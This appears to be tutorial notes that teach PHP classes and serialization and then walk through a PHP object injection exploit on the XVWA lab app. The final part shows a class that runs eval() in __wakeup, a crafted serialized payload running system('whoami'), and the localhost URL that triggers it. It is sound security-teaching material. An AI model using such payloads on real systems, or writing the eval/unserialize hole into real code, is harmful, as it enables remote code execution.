PHP Object Injection
Understanding PHP class & objects
Creating Class in php
class Car {
// The code
}
Adding Properties to class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
}
Creating Object from calss
$bmw = new Car ();
Creating more objects from a class
$bmw = new Car ();
$mercedes = new Car ();
Getting Object's properties
echo $bmw -> color;
echo $mercedes -> color;
Setting Object's properties
$bmw -> color = 'blue';
Adding methods to a class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
Using methods from Objects
$bmw = new Car ();
$mercedes = new Car ();
echo $bmw -> hello();
echo $mercedes -> hello()
Test Case
<?php
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
$bmw=new Car();
echo $bmw -> color;
?>
Result for Test Case
Understanding $this keyword
Class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
$this usage
$this -> propertyName;
$this -> methodName();
$this usage with class
class Car {
// The properties
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
// The method can now approach the class properties
// with the $this keyword
public function hello()
{
return "Beep I am a <i>" . $this -> comp . "</i>, and I am <i>" .
$this -> color;
}
}
Objects with class
$bmw = new Car();
$mercedes = new Car();
Call Method with objects
echo $bmw -> hello();
Test Case for $this
<?php
class Car {
// The properties
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
// The method can now approach the class properties
// with the $this keyword
public function hello()
{
return "Beep I am a <i>" . $this -> comp . "</i>, and I am <i>" .
$this -> color;
}
}
$bmw = new Car();
echo $bmw -> hello();
?>
Result for Test case $this
Understanding Magic Methods & Constants
__construct()
class Car{
private $model;
// A constructor method.
public function __construct($model)
{
$this -> model = $model;
}
}
Objects from a class
$car1 = new Car();
Result
Warning: Missing argument 1 for Car::__construct()
Adding Argument
$car1 = new Car("Mercedes");
Adding output method for echo
class Car {
private $model;
//__construct
public function __construct ($model)
{
$this -> model = $model;
}
public function getCarModel()
{
return ' The car model is: ' . $this -> model;
}
}
Object with arguments for __construct() & echo via getCarModel()
$car1 = new Car("Mercedes");
echo $car1 -> getCarModel();
Test Case for Magic Methods
<?php
class Car {
private $model;
//__construct
public function __construct ($model)
{
$this -> model = $model;
}
public function getCarModel()
{
return ' The car model is: ' . $this -> model;
}
}
//We pass the value of the variable once we create the object
$car1 = new Car("Mercedes");
echo $car1 -> getCarModel();
?>
Result for Test Case magic methods
Understanding Serialized & Unserialzed
serialize usage
$serialized = serialize($obj);
unserialze usage
$obj2 = unserialize($serialized);
A class to test serialize & unserialized
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function hello()
{
return $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
Echo test
$obj = new Test();
$serialized = serialize($obj);
echo "Serialized : ".$serialized;
echo "Unserialized form $serialized : ".$obj2 = unserialize($serialized);
echo $obj2->hello();
Test Case for Serialized & Serialized
<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function hello()
{
return $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
$obj = new Test();
$serialized = serialize($obj);
echo "Serialized : ".$serialized;
$obj2 = unserialize($serialized);
echo "Unserialzed from $serialized : ".$obj2->hello();
?>
Result for Test Case
Understanding PHP Object Injection
Class from XVWA
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
Serialized from XVWA
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
User input for Object
$var1=unserialize($_REQUEST['r']);
This mean
$var1=unserialize(a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";});
Output from XVWA
echo "<br/>".$var1[0]." - ".$var1[1];
Getting Serialized for $inject with class PHPObjectInjection
<?php
class PHPObjectInjection
{
public $inject="system('whoami');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?>
Result
PHP Object Injection for XVWA
http://localhost:8012/xvwa/vulnerabilities/php_object_injection/?r=O:18:%22PHPObjectInjection%22:1:{s:6:%22inject%22;s:17:%22system(%27whoami%27);%22;}
Result
Why system('whoami') work?
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
eval() allows string to code.